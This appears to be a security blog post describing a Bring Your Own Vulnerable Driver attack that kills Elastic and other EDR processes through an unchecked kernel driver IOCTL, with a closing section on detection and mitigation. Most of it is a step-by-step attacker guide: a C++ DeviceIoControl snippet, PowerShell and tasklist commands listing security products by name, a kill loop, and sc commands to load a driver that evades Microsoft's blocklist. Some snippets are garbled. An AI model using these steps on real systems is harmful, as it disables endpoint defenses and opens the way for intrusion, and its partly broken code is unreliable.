Listen to this Post
Introduction:
A new Bring Your Own Vulnerable Driver (BYOVD) attack has been discovered that effectively neutralizes Elastic EDR by exploiting an unlisted kernel driver. The driver exposes IOCTL codes to terminate processes based solely on a provided PID, with no privilege or origin checks. This flaw allows an attacker to feed it a list of EDR vendor process names, enabling a single IOCTL call to scan for and kill every endpoint protection process running on the system.
Learning Objectives:
- Understand the mechanics of a BYOVD attack targeting EDR processes.
- Learn how to identify vulnerable IOCTL handlers in kernel drivers.
- Master techniques for enumerating and terminating security products via kernel-level exploits.
You Should Know:
1. Understanding the BYOVD Vulnerability and IOCTL Abuse
The core vulnerability lies in a driver that exposes IOCTL (Input/Output Control) codes for terminating processes. The driver fails to validate the caller’s security context, allowing any user-mode process to send a request and kill any process by PID. Attackers can extend this by predefining a list of EDR-related process names (e.g., elastic-endpoint.exe, elastic-agent.exe), iterating through them, and sending termination commands.
To test for such a vulnerability, you would first enumerate all IOCTL codes supported by a driver using tools like `IoNinja` or by reverse engineering. In Linux, you might use `ioctl` commands via a custom C program, while on Windows, you can use `DeviceIoControl` in C++ or PowerShell with P/Invoke.
Step‑by‑step guide:
- Identify the driver device name: Use `WinObj` or programmatically query `\\.\` devices.
- Enumerate IOCTLs: Write a fuzzer or use static analysis to find the termination IOCTL.
- Craft the payload: Create a list of target process names.
- Send the IOCTL: From a low-privileged process, call `DeviceIoControl` with the vulnerable driver handle.
Example C++ code snippet to send an IOCTL:
HANDLE hDevice = CreateFileA("\\.\VulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
DWORD bytesReturned;
DeviceIoControl(hDevice, IOCTL_TERMINATE_PROCESS, &targetPid, sizeof(DWORD), NULL, 0, &bytesReturned, NULL);
2. Enumerating EDR Processes for Termination
Before killing EDR, attackers must compile a list of running security processes. This can be done using standard Windows commands or WMI. On Linux, similar enumeration is done via `ps` or procfs.
Windows commands:
List all processes with names containing common EDR strings
Get-Process | Where-Object {$<em>.ProcessName -like "elastic" -or $</em>.ProcessName -like "edr" -or $_.ProcessName -like "defender"} | Select-Object ProcessName, Id
Alternatively, using `tasklist` and `findstr`:
tasklist /fo csv | findstr /i "elastic crowdstrike sentinelone defender"
The attacker then feeds these PIDs to the vulnerable driver.
- Exploiting the Driver with a Custom Kill List
Instead of targeting one PID at a time, the attacker modifies the IOCTL input structure to accept a list. If the driver only accepts a single PID, they loop through the list. If the driver has a custom structure, they might craft a buffer containing multiple PIDs or process names.
Step‑by‑step guide:
- Create a text file with target process names (e.g.,
edr_targets.txt). - Use a PowerShell script to iterate and call a custom executable that sends the IOCTL.
- Example PowerShell loop:
$pids = Get-Process elastic-endpoint, elastic-agent, edr-monitor | Select-Object -ExpandProperty Id foreach ($pid in $pids) { .\kill_driver.exe $pid }
4. Bypassing Microsoft’s Vulnerable Driver Blocklist
The driver used is not yet on Microsoft’s blocklist, meaning it can be loaded without triggering Defender or SmartScreen. Attackers can manually load it using `sc` or `fltmc` if they have admin rights. Once loaded, the driver remains active until blocklisted or removed.
Commands to load a driver (admin required):
sc create VulnerableDrv binPath= C:\path\to\driver.sys type= kernel sc start VulnerableDrv
After loading, the device is accessible for exploitation.
5. Detection and Mitigation Strategies
Defenders must monitor for unusual driver loads, especially those not signed by trusted vendors or with suspicious names. Use Sysmon to log driver load events (Event ID 6). Additionally, enable Driver Signature Enforcement and periodically check running drivers against Microsoft’s blocklist using PowerShell:
Get-WindowsDriver -Online | Where-Object {$_.DriverSignature -eq "Unsigned"}
Implement process protection flags (PsSetCreateProcessNotifyRoutine) to prevent termination of critical processes, though many BYOVD attacks bypass this by operating in kernel mode.
What Undercode Say:
- Key Takeaway 1: BYOVD attacks remain a potent method to disable EDR because they exploit legitimate drivers, circumventing user-mode hooks and signature checks.
- Key Takeaway 2: The lack of proper IOCTL validation in kernel drivers is a systemic issue; vendors must implement origin and privilege checks, and security teams must proactively monitor driver loads.
This discovery underscores the arms race between EDR vendors and attackers. While Microsoft’s blocklist is a reactive measure, attackers are constantly finding new, unlisted drivers to weaponize. Organizations should adopt a zero-trust approach to kernel drivers, using application control policies like WDAC to block unauthorized drivers, and employ behavioral detection for anomalous process termination patterns.
Prediction:
We will see a surge in BYOVD attacks using drivers from obscure hardware vendors or those with valid signatures but weak IOCTL implementations. EDR vendors will need to move toward kernel-mode callbacks and event tracing that can detect mass process termination attempts, even if initiated from kernel space. Microsoft may expedite the driver blocklist update process, but the fundamental vulnerability lies in driver code, requiring a shift in driver development practices.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Husam Gameel – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
